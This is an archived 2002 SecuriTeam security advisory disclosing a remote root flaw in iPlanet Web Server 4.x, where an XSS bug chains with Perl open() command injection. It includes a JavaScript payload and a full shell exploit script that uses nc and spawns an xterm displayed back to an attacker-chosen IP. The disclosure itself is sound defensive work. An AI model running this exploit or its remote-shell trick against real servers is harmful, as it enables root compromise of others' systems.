[NEWS] iPlanet WebServer Vulnerable to Remote Root Compromise

From: support@securiteam.com
Date: 11/21/02

  • Next message: support@securiteam.com: "[NEWS] Remote Buffer Overflow Vulnerability in Zeroo HTTP Server" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 21 Nov 2002 12:16:16 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      iPlanet WebServer Vulnerable to Remote Root Compromise
    ------------------------------------------------------------------------

    SUMMARY

    Under certain circumstances an attacker can execute commands (usually as
    root), using the combination of two security vulnerabilities on iPlanet
    Web Server 4.* up to SP11 (NG-XSS).

    These two vulnerabilities are:
     - Insecure open()s at Admin Server PERL scripts
     - Cross Site Scripting

    The only need will be, through social skills, to have the Administrator
    review the logs within iPlanet Admin Server.

    This vulnerability can not be exploited on a 6.* version because XSS was
    silently fixed in these releases.

    DETAILS

    Vulnerable systems:
     * iPlanet WebServer version 4.* up to SP11

    If we consider each vulnerability alone, we have no chance to execute
    commands at the iPlanet Web Server since XSS payload is Browser Hijacking
    and the vulnerable PERL script is protected by an authentication schema.

    iPlanet Web Server suffers from a XSS vulnerability when the Administrator
    reviews the error logs through iPlanet Admin Server. XSS triggers once the
    Administrator has successfully logged on the Admin Server.

    The trick is not to exploit the open() PERL vulnerability directly, but
    use instead the XSS to redirect the Administrator's browser to the URL
    that will cause the open() command injection. Since he is already
    authenticated, we bypass the authentication schema.

    We will use the following JavaScript code:
    <scr*ipt>
    window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
    </scr*ipt>

    Recommendations:
    Avoid iPlanet's Admin Server usage, until Sun releases a patch for these
    vulnerabilities. Alternatively upgrade to iPlanet v.6.*

    Exploit:
    #!/bin/sh
    #
    # iPlanet Remote root exploit
    # Tested versions: 4.* up to SP11
    #
    # By: Fermín J. Serna CTO, NGSEC
    # http://www.ngsec.com <fjserna@ngsec.com>
    #
    # Madrid, 09/10/2002

    echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO,
    NGSEC"
    echo "http://www.ngsec.com <fjserna@ngsec.com>"
    echo

    if [ $# != "3" ]
    then
     echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
     exit
    fi

    echo "1.- Setting xhost +$1"
    xhost +$1
    echo

    echo "2.- Building XSS string:"
    CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
    echo $CADENA
    echo

    echo "3.- Sending HTTP request:"
    SEND="GET /$CADENA HTTP/1.0"
    echo "$SEND"
    (echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2
    echo
    echo

    echo "4.- Time to wait for the xterm :P. Admin should review Web Server
    logs using Admin Server Tool."
    echo

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:fjserna@ngsec.com> Fermín J.
    Serna of Next Generation Security Technologies.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages